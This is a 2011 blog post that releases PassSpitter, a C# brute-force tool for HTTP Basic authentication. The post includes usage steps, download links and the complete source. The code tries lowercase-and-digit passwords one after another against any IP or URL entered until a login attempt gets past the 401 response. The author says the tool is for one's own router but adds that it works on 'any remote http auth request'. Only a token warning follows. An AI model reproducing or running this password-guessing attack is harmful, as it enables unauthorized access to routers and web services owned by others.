 I took a brute-force approach to the problem. Some old tools I used in the past are no longer working properly... (remember Brutus?!!) And I had in the past tried my luck at this, but aimed too high and got lost into recursive functions... So there you have it. MadLogik's very own: PassSpitter v1.0 v1.0 Screenshot:  Usage: (really? just start it up and you should be gold!) Obviously what you will need is TIME and not SKILLS!  1: Double click on the cute PassSpitter icon, a console like window will open (see screenshot above) 2: Enter the minimum length to start with... I suggest 0, but if you know it's 8 characters long, then you would save quite some time starting at 8 right away! 3: Enter the ip... now this tool is meant to be used with your OWN router over your LAN for TESTING PURPOSES.... but it will work with any remote http auth request... ;) 4: Enter the username, admin for most routers... but I found out my linksys wrt610n will take ANY usernames! :$ 5: let it do it's magic.. you will get updates when you get to the next letter... and live password display ... it's not slowing down the software enough for me to take it off... 6: get the resolved password when you hear the beep! ps: should something go wrong (that means, if the software gets anything else than a "401 unauthorized" message) then you will be asked if you want to continue or not... simply enter "n" to stop ... close the window and start it back up ... choice is yours! Good to know: Currently, it's only going to try lowercase letters and numbers ... otherwise it becomes too much of a task... and you should have access to the reset switch on your router after all ;) private static char[] charactersToTest = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1','2','3','4','5', '6','7','8','9','0'}; In other versions I will allow you to choose... if I ever make other versions ;) Afterall, you can download the source below, a free version of visual c# 2010 and run this the way YOU want... ;) //private static char[] charactersToTest = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '$', '#', '@', '-' }; //... who knows ? !! :P Download Links: v1.0 Release Version: http://bayfiles.com/file/Z6n/yFxgTN/PassSpitter_v1.0.exe v1.01 Debug Version: http://bayfiles.com/file/Z6D/lx8ref/PassSpitter.exe I found the debug version to run faster but it's also more prone to receiving errors or simply crashing... I found the speed to be between 50 and 150 passwords per seconds. Not bad! at all! BY THE WAY: I must give credits to Janosh Woschitz for most of the code in the bruteforce engine! Thanks Mate. I just hacked in some web auth testing code and setup a loop for my needs... looks dirty but it all works quite good! If you have comments, hit me up on twitter! See ya! Ohhh yeah... the code... Well Here's the project files... and below the code.. v1.01 Source Code Download: http://bayfiles.com/file/Z7l/Og5nys/PassSpitter_source_v1.0.zip Code: using System; class Program { #region Private variables // the secret password which we will try to find via brute force private static string result; private static bool isMatched = false; private static bool isFailing = false; /* The length of the charactersToTest Array is stored in a * additional variable to increase performance */ private static int charactersToTestLength = 0; private static long computedKeys = 0; /* An array containing the characters which will be used to create the brute force keys, * if less characters are used (e.g. only lower case chars) the faster the password is matched */
private static char[] charactersToTest = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1','2','3','4','5', '6','7','8','9','0'};
//private static char[] charactersToTest = { '1', '2', '3', '4', '5', '6', '7', '8', '9', '0' }; //private static char[] charactersToTest = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z' }; //private static char[] charactersToTest = { 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z' }; //private static char[] charactersToTest = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0' }; //private static char[] charactersToTest = { 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0' }; //private static char[] charactersToTest = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0' }; //private static char[] charactersToTest = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '$', '#', '@', '-' };
#endregion
static void Main(string[] args) { starthere: Console.Clear(); Console.WriteLine("**********************************************************************"); Console.WriteLine("****** MadLogik's PassSpitter v1.0 (c) 2011 madlogik@gmail.com ******"); Console.WriteLine("**********************************************************************");
// The length of the array is stored permanently during runtime charactersToTestLength = charactersToTest.Length; // The length of the password is unknown, so we have to run trough the full search space Console.WriteLine("\nEnter the minimum password length"); var estimatedPasswordLength = (int.Parse(Console.ReadLine()) - 1); //if people enter 0 .. it will be -1... so lets fix that.. :P if (estimatedPasswordLength < 0) { estimatedPasswordLength = 0; }
Console.WriteLine("Enter the URL like http://192.168.1.1 or just the ip:"); string mytargetip = Console.ReadLine();
if (!mytargetip.Contains("http")) { mytargetip = "http://" + mytargetip; }
Console.WriteLine("Enter the Username like admin:"); string myusername = Console.ReadLine();
var timeStarted = DateTime.Now; Console.WriteLine("Start BruteForce - {0}", timeStarted.ToString());
while (!isMatched) {
/* The estimated length of the password will be increased and every possible key for this * key length will be created and compared against the password */ estimatedPasswordLength++; startBruteForce(estimatedPasswordLength, myusername, mytargetip); Console.WriteLine("\nTime elapsed: {0}s, Passwords tested: {1}, Pass/sec: {2}", DateTime.Now.Subtract(timeStarted).TotalSeconds, computedKeys, (computedKeys / DateTime.Now.Subtract(timeStarted).TotalSeconds)); }
Console.WriteLine("\n**********************************************************************"); Console.Beep(500, 500); Console.Beep(300, 250); Console.Beep(500, 500); Console.WriteLine("Password matched. - {0}", DateTime.Now.ToString()); Console.WriteLine("Time passed: {0}s", DateTime.Now.Subtract(timeStarted).TotalSeconds); Console.WriteLine("Resolved password: {0}", result); Console.WriteLine("Computed keys: {0}", computedKeys);
//end Console.ReadLine(); Console.WriteLine("Do you want to try again?"); string wannarideagain = Console.ReadLine(); if (wannarideagain == "y") { isMatched = false; isFailing = false; computedKeys = 0; charactersToTestLength = 0; goto starthere; } }
#region Private methods
/// <summary> /// Starts the recursive method which will create the keys via brute force /// </summary> /// <param name="keyLength">The length of the key</param> private static void startBruteForce(int keyLength, string myusername, string mytargetip) { if (!isMatched) {
Console.WriteLine("\nTesting passwords with {0} letters or numbers", keyLength); var keyChars = createCharArray(keyLength, charactersToTest[0]); // The index of the last character will be stored for slight perfomance improvement var indexOfLastChar = keyLength - 1; createNewKey(0, keyChars, keyLength, indexOfLastChar, myusername, mytargetip); } else { return; } }
/// <summary> /// Creates a new char array of a specific length filled with the defaultChar /// </summary> /// <param name="length">The length of the array</param> /// <param name="defaultChar">The char with whom the array will be filled</param> /// <returns></returns> private static char[] createCharArray(int length, char defaultChar) { return (from c in new char[length] select defaultChar).ToArray(); }
/// <summary> /// This is the main workhorse, it creates new keys and compares them to the password until the password /// is matched or all keys of the current key length have been checked /// </summary> /// <param name="currentCharPosition">The position of the char which is replaced by new characters currently</param> /// <param name="keyChars">The current key represented as char array</param> /// <param name="keyLength">The length of the key</param> /// <param name="indexOfLastChar">The index of the last character of the key</param> private static void createNewKey(int currentCharPosition, char[] keyChars, int keyLength, int indexOfLastChar, string myusername, string mytargetip) { if (!isMatched) { var nextCharPosition = currentCharPosition + 1; // We are looping trough the full length of our charactersToTest array for (int i = 0; i < charactersToTestLength; i++) { /* The character at the currentCharPosition will be replaced by a * new character from the charactersToTest array => a new key combination will be created */ keyChars[currentCharPosition] = charactersToTest[i]; // The method calls itself recursively until all positions of the key char array have been replaced if (currentCharPosition < indexOfLastChar) { createNewKey(nextCharPosition, keyChars, keyLength, indexOfLastChar, myusername, mytargetip); } else { // A new key has been created, remove this counter to improve performance computedKeys++;
/* The char array will be converted to a string and compared to the password. If the password * is matched the loop breaks and the password is stored as result. */
string mypassword = new String(keyChars); string mycontent = ""; if (isFailing) { Console.WriteLine("\nWarning! You are not getting the expected 401 unauth message... Continue y/n ?"); string failcontinue = Console.ReadLine(); if (failcontinue == "n") { isMatched = true; result = "Operation Failed!"; return; } }
try { WebRequest myReq = WebRequest.Create(mytargetip); string usernamePassword = myusername + ":" + mypassword; CredentialCache mycache = new CredentialCache(); mycache.Add(new Uri(mytargetip), "Basic", new NetworkCredential(myusername, mypassword)); myReq.Credentials = mycache; myReq.Headers.Add("Authorization", "Basic " + Convert.ToBase64String(new ASCIIEncoding().GetBytes(usernamePassword))); // if it breaks... it's here. 401 unauth WebResponse wr = myReq.GetResponse(); Stream receiveStream = wr.GetResponseStream(); StreamReader reader = new StreamReader(receiveStream, Encoding.UTF8); mycontent += reader.ReadLine(); mycontent += System.Environment.NewLine; string currline = mycontent; while (currline != null) { currline = reader.ReadLine(); mycontent += currline + System.Environment.NewLine; } reader.Close();
//Console.Write(mycontent); //source code!!!
//MessageBox.Show("The Password is: " + password, "Password Found!"); isMatched = true; result = new String(keyChars); return;
} catch (Exception exx) { Console.Write("\rTesting Password: {0}", new String(keyChars)); if (!exx.Message.ToString().Contains("401")) { isFailing = true; Console.WriteLine("\n\r{0}", exx.Message.ToString()); return; } } } } } else { return; } } #endregion } } WARNING: Don't you dare trying this tool to hack into a server that isn't your's ! Be a gentleman about it.  |
|
|
[Latest HeadLines] >
Want to get in YOUR router, lost the password, can't reset it?posted Sep 6, 2011 5:20 AM by Mad Logik [ updated Sep 6, 2011 12:08 PM ] |